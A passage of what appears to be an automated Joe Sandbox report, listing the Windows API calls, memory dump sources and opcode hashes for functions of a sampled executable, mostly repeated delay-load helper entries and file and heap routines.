                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 46ec5749b4711fd13b966fae6cbd5c17a6a4cd5977079bf8fc85c465510a230b
                                                              • Instruction ID: 0f4fa56850bf930332853a4f72eee0f16788d7eeea30cd2c74702045ba620d32
                                                              • Opcode Fuzzy Hash: 46ec5749b4711fd13b966fae6cbd5c17a6a4cd5977079bf8fc85c465510a230b
                                                              • Instruction Fuzzy Hash: E8B012C129A14A7D3A0452A7DD07C7701FCC0C0F10370703BB400F52C1D8402E090031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: efdfd8b14e763454b6e448e4632dd6444c7a07afe097ba371735f0a87d16322f
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: efdfd8b14e763454b6e448e4632dd6444c7a07afe097ba371735f0a87d16322f
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 9395b7a750d99e693401931a51390f49175727ee397e9b24ae264b47220bb6b7
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 9395b7a750d99e693401931a51390f49175727ee397e9b24ae264b47220bb6b7
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: b5fa85e0c30136bb18259340a02d9caa53343a3af64d7fcedc413d566bd7869c
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: b5fa85e0c30136bb18259340a02d9caa53343a3af64d7fcedc413d566bd7869c
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 8b0475a662c6ecefc9ceda36ccdd88c9b562e624f57dc84b4fd3ffeed8344cbd
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 8b0475a662c6ecefc9ceda36ccdd88c9b562e624f57dc84b4fd3ffeed8344cbd
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 90e2d56b8984a9d8d3f4334c7778b16b2a74efdeeec5169f6e46471186f34e0c
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 90e2d56b8984a9d8d3f4334c7778b16b2a74efdeeec5169f6e46471186f34e0c
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 5fb89e85ea7afd76ac10b6a74180202f0d97069969c0453449373ca9076e016b
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 5fb89e85ea7afd76ac10b6a74180202f0d97069969c0453449373ca9076e016b
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 35fa323e24b5abeee3f682d7bb6cdae65ad9e87e21f344661d3b7f5f4b498fd4
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 35fa323e24b5abeee3f682d7bb6cdae65ad9e87e21f344661d3b7f5f4b498fd4
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 92ae02b451adb307f151936a6e388708dd3048156357ec1909ebda078bb3fd8e
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 92ae02b451adb307f151936a6e388708dd3048156357ec1909ebda078bb3fd8e
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: d98e7a96bbd9aafa89e87e9cbbe6fdaa9b76dd742f48c4286971fd200ef10084
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: d98e7a96bbd9aafa89e87e9cbbe6fdaa9b76dd742f48c4286971fd200ef10084
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: a6666684923b1211b161ed7e1ab96010ed02490b137ef3f15dde545a9482428f
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: a6666684923b1211b161ed7e1ab96010ed02490b137ef3f15dde545a9482428f
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              APIs
                                                                • Part of subcall function 00EA013B: GetOEMCP.KERNEL32(00000000,?,?,00EA03C4,?), ref: 00EA0166
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EA0409,?,00000000), ref: 00EA05E4
                                                              • GetCPInfo.KERNEL32(00000000,00EA0409,?,?,?,00EA0409,?,00000000), ref: 00EA05F7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: a0cb2462bca48b4e26f4eeca77f23418ae282ca3c11bb0a84899827620be6971
                                                              • Instruction ID: 0f5ca2553077eb8fe9065a3cafd82f8655311ddfa375538c7d42c144fc7b5319
                                                              • Opcode Fuzzy Hash: a0cb2462bca48b4e26f4eeca77f23418ae282ca3c11bb0a84899827620be6971
                                                              • Instruction Fuzzy Hash: A65187B09002059FDB209F31C8916FBBBE5EFCA318F14506FE086AF951D635B946CB81
                                                              APIs
                                                              • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 00E820B3
                                                              • GetLastError.KERNEL32 ref: 00E820BE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 0592b2d98f71e7c01324b22c80141362625c88f8f7b180faf65dcc7864a0b496
                                                              • Instruction ID: e5ddda9c66959f9f348f6f647df1b8a3e2d0f7d703f677947abb5e4fe9b1cb92
                                                              • Opcode Fuzzy Hash: 0592b2d98f71e7c01324b22c80141362625c88f8f7b180faf65dcc7864a0b496
                                                              • Instruction Fuzzy Hash: 6141D2306043018FDB24EF25C64456AB7E6FF98314F14992DEA8EA32A0D770EC49DB91
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?), ref: 00E822BC
                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00E82370
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 2e314e624bd0ea3d012689a7822968afb7dc8fa6e18c5b64719ed9cdfe92d2c7
                                                              • Instruction ID: a55ea81964db2dc2f78f9612e9372a252e96e7c800db26379e192ad57a840d9c
                                                              • Opcode Fuzzy Hash: 2e314e624bd0ea3d012689a7822968afb7dc8fa6e18c5b64719ed9cdfe92d2c7
                                                              • Instruction Fuzzy Hash: BB214331248246AFC314EF74C891AABBBE8AF56308F08590DF4CD97151D338E90DD761
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?), ref: 00E81C36
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800), ref: 00E81C66
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: da2efe123d42e26c7bf509d32ab8fec039f52f13a9482e9fd741772b844ba797
                                                              • Instruction ID: 681051ff481a8b67f1dab92baca6cd40975a6512e51d65acb2b82bb795a6ba82
                                                              • Opcode Fuzzy Hash: da2efe123d42e26c7bf509d32ab8fec039f52f13a9482e9fd741772b844ba797
                                                              • Instruction Fuzzy Hash: 47210071044744AFE330AA65CC88BE7B2ECEB49764F401A19F9DEE21C1C774A8858731
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9F0A8
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,00EA0987,?,00000004,00000000,?,?,?,00E9D066,?,00000000), ref: 00E9F0E4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
